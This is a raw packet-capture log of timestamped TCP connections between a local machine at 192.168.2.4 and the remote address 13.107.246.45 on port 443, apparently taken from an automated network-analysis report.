Nov 13, 2024 18:44:25.763015985 CET	443	49851	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.763078928 CET	49851	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.763214111 CET	49851	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.763221025 CET	443	49851	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.888156891 CET	49844	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.888175964 CET	443	49844	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.888273001 CET	443	49847	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.888349056 CET	443	49847	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.888523102 CET	49847	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.888637066 CET	49847	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.888638020 CET	49847	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.888680935 CET	443	49847	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.888712883 CET	443	49847	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.891130924 CET	49852	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.891180038 CET	443	49852	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:25.891259909 CET	49852	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.891386032 CET	49852	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:25.891397953 CET	443	49852	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.075758934 CET	49846	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.075824022 CET	443	49846	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.162317991 CET	443	49848	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.162971973 CET	49848	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.163060904 CET	443	49848	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.163337946 CET	49848	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.163352966 CET	443	49848	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.297075987 CET	443	49848	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.297302961 CET	443	49848	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.297499895 CET	49848	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.297499895 CET	49848	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.297499895 CET	49848	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.299679995 CET	49853	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.299776077 CET	443	49853	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.299880028 CET	49853	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.299978971 CET	49853	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.300003052 CET	443	49853	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.326807022 CET	443	49849	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.327131033 CET	49849	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.327155113 CET	443	49849	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.327493906 CET	49849	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.327501059 CET	443	49849	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.364929914 CET	443	49850	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.365411997 CET	49850	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.365475893 CET	443	49850	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.365587950 CET	49850	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.365603924 CET	443	49850	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.466593027 CET	443	49849	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.466674089 CET	443	49849	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.466730118 CET	49849	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.466759920 CET	443	49849	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.466782093 CET	443	49849	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.466824055 CET	49849	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.466936111 CET	49849	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.466953039 CET	443	49849	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.466965914 CET	49849	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.466973066 CET	443	49849	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.469033003 CET	49854	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.469080925 CET	443	49854	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.469265938 CET	49854	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.469321966 CET	49854	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.469336987 CET	443	49854	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.499779940 CET	443	49850	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.499936104 CET	443	49850	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.500161886 CET	49850	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.500161886 CET	49850	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.500161886 CET	49850	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.501688957 CET	49855	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.501777887 CET	443	49855	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.501853943 CET	49855	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.501950026 CET	49855	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.501972914 CET	443	49855	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.506794930 CET	443	49851	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.507052898 CET	49851	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.507071018 CET	443	49851	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.507396936 CET	49851	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.507404089 CET	443	49851	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.607100964 CET	49848	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.607168913 CET	443	49848	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.628448009 CET	443	49852	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.628987074 CET	49852	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.629075050 CET	443	49852	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.629213095 CET	49852	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.629220963 CET	443	49852	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.639897108 CET	443	49851	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.639998913 CET	443	49851	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.640039921 CET	49851	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.640278101 CET	49851	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.640290976 CET	443	49851	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.640305042 CET	49851	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.640312910 CET	443	49851	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.642625093 CET	49856	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.642720938 CET	443	49856	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.642815113 CET	49856	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.642915964 CET	49856	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.642940998 CET	443	49856	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.758472919 CET	443	49852	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.758964062 CET	443	49852	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.759151936 CET	49852	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.759151936 CET	49852	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.759152889 CET	49852	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.761482954 CET	49857	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.761569977 CET	443	49857	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.761671066 CET	49857	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.761953115 CET	49857	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.762037039 CET	443	49857	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:26.810153961 CET	49850	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:26.810218096 CET	443	49850	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.060174942 CET	49852	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.060241938 CET	443	49852	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.061413050 CET	443	49853	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.061830044 CET	49853	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.061862946 CET	443	49853	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.062258959 CET	49853	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.062268019 CET	443	49853	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.196192980 CET	443	49853	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.196264029 CET	443	49853	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.196327925 CET	49853	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.196373940 CET	443	49853	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.196561098 CET	443	49853	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.196623087 CET	49853	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.196623087 CET	49853	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.196675062 CET	49853	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.196703911 CET	443	49853	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.200604916 CET	49858	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.200649023 CET	443	49858	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.200721025 CET	49858	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.201036930 CET	49858	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.201065063 CET	443	49858	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.241720915 CET	443	49854	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.242333889 CET	49854	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.242377043 CET	443	49854	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.243119001 CET	49854	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.243128061 CET	443	49854	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.252711058 CET	443	49855	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.253071070 CET	49855	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.253137112 CET	443	49855	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.253498077 CET	49855	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.253556013 CET	443	49855	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.372914076 CET	443	49856	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.373334885 CET	49856	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.373366117 CET	443	49856	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.373558998 CET	49856	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.373567104 CET	443	49856	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.377114058 CET	443	49854	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.377275944 CET	443	49854	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.377531052 CET	49854	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.377531052 CET	49854	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.379780054 CET	49859	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.379780054 CET	49854	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.379848003 CET	443	49859	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.379892111 CET	443	49854	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.379946947 CET	49859	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.380108118 CET	49859	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.380127907 CET	443	49859	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.381213903 CET	443	49855	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.381366014 CET	443	49855	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.381426096 CET	49855	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.381470919 CET	49855	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.381498098 CET	443	49855	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.381515980 CET	49855	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.381525993 CET	443	49855	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.383513927 CET	49860	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.383553028 CET	443	49860	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.383624077 CET	49860	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.383750916 CET	49860	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.383766890 CET	443	49860	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.493896961 CET	443	49857	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.494975090 CET	49857	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.495009899 CET	443	49857	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.495417118 CET	49857	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.495445967 CET	443	49857	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.503175974 CET	443	49856	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.503264904 CET	443	49856	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.503592014 CET	49856	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.503793001 CET	49856	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.503843069 CET	443	49856	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.503875971 CET	49856	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.503891945 CET	443	49856	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.505525112 CET	49861	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.505615950 CET	443	49861	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.505717993 CET	49861	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.505810976 CET	49861	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.505839109 CET	443	49861	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.625257015 CET	443	49857	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.625297070 CET	443	49857	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.625354052 CET	443	49857	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.625483036 CET	49857	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.625557899 CET	49857	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.625557899 CET	49857	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.625559092 CET	49857	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.625607014 CET	443	49857	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.627732992 CET	49862	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.627769947 CET	443	49862	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.628060102 CET	49862	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.628253937 CET	49862	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.628268003 CET	443	49862	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.935081959 CET	49857	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.935117960 CET	443	49857	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.969896078 CET	443	49858	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.970345974 CET	49858	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.970432043 CET	443	49858	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:27.970813036 CET	49858	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:27.970829010 CET	443	49858	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.115617037 CET	443	49858	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.115665913 CET	443	49858	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.115740061 CET	49858	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.115931988 CET	49858	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.115931988 CET	49858	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.115976095 CET	443	49858	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.116003990 CET	443	49858	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.118287086 CET	49863	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.118379116 CET	443	49863	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.118510008 CET	49863	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.118604898 CET	49863	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.118633032 CET	443	49863	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.120867014 CET	443	49860	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.121156931 CET	49860	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.121170998 CET	443	49860	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.121570110 CET	49860	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.121575117 CET	443	49860	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.123238087 CET	443	49859	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.124303102 CET	49859	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.124336958 CET	443	49859	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.124635935 CET	49859	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.124665022 CET	443	49859	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.251050949 CET	443	49861	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.252576113 CET	49861	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.252638102 CET	443	49861	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.252908945 CET	49861	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.252965927 CET	443	49861	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.256001949 CET	443	49859	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.256025076 CET	443	49860	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.256077051 CET	443	49859	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.256187916 CET	443	49859	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.256191015 CET	443	49860	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.256278992 CET	49860	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.256336927 CET	49859	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.256336927 CET	49859	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.256336927 CET	49859	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.257250071 CET	49860	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.257268906 CET	443	49860	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.257285118 CET	49860	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.257292032 CET	443	49860	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.259975910 CET	49864	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.260066986 CET	443	49864	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.260349035 CET	49864	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.260657072 CET	49865	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.260742903 CET	443	49865	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.260823965 CET	49864	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.260915995 CET	443	49864	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.261055946 CET	49865	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.261055946 CET	49865	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.261194944 CET	443	49865	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.353707075 CET	443	49862	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.354052067 CET	49862	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.354063034 CET	443	49862	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.354425907 CET	49862	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.354430914 CET	443	49862	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.387182951 CET	443	49861	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.387223959 CET	443	49861	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.387285948 CET	443	49861	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.387471914 CET	49861	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.387471914 CET	49861	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.387471914 CET	49861	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.389960051 CET	49866	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.390055895 CET	443	49866	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.390172958 CET	49866	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.390305996 CET	49866	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.390341997 CET	443	49866	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.480686903 CET	443	49862	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.481111050 CET	443	49862	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.481174946 CET	49862	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.481312037 CET	49862	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.481312037 CET	49862	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.481324911 CET	443	49862	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.481340885 CET	443	49862	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.483724117 CET	49867	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.483813047 CET	443	49867	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.483901024 CET	49867	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.484069109 CET	49867	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.484127998 CET	443	49867	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.560163975 CET	49859	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.560230017 CET	443	49859	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.700804949 CET	49861	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.700871944 CET	443	49861	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.841645002 CET	443	49863	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.860238075 CET	49863	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.860302925 CET	443	49863	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.862129927 CET	49863	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.862185001 CET	443	49863	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.994013071 CET	443	49863	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.994090080 CET	443	49863	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.994201899 CET	49863	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.994213104 CET	443	49863	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.994283915 CET	49863	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.994410992 CET	49863	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.994450092 CET	443	49863	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:28.994498968 CET	49863	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:28.994514942 CET	443	49863	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.001550913 CET	443	49865	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.010457039 CET	443	49864	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.044528961 CET	49865	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.060173988 CET	49864	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.073504925 CET	49865	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.073533058 CET	443	49865	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.073813915 CET	49865	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.073843002 CET	443	49865	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.075737000 CET	49864	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.075793982 CET	443	49864	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.076200008 CET	49864	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.076215029 CET	443	49864	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.078295946 CET	49868	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.078386068 CET	443	49868	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.078672886 CET	49868	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.078778028 CET	49868	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.078798056 CET	443	49868	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.138933897 CET	443	49866	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.139234066 CET	49866	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.139270067 CET	443	49866	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.139837027 CET	49866	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.139893055 CET	443	49866	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.200426102 CET	443	49865	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.200609922 CET	443	49865	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.200850964 CET	49865	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.201265097 CET	49865	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.201265097 CET	49865	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.201297998 CET	443	49865	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.201316118 CET	443	49865	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.204108953 CET	49869	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.204154968 CET	443	49869	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.204216957 CET	49869	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.204514980 CET	49869	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.204535007 CET	443	49869	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.205662966 CET	443	49864	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.205739021 CET	443	49864	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.205862045 CET	443	49864	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:29.205965042 CET	49864	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.205965042 CET	49864	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.205965042 CET	49864	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.205965042 CET	49864	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:29.207935095 CET	49870	443	192.168.2.4	13.107.246.45
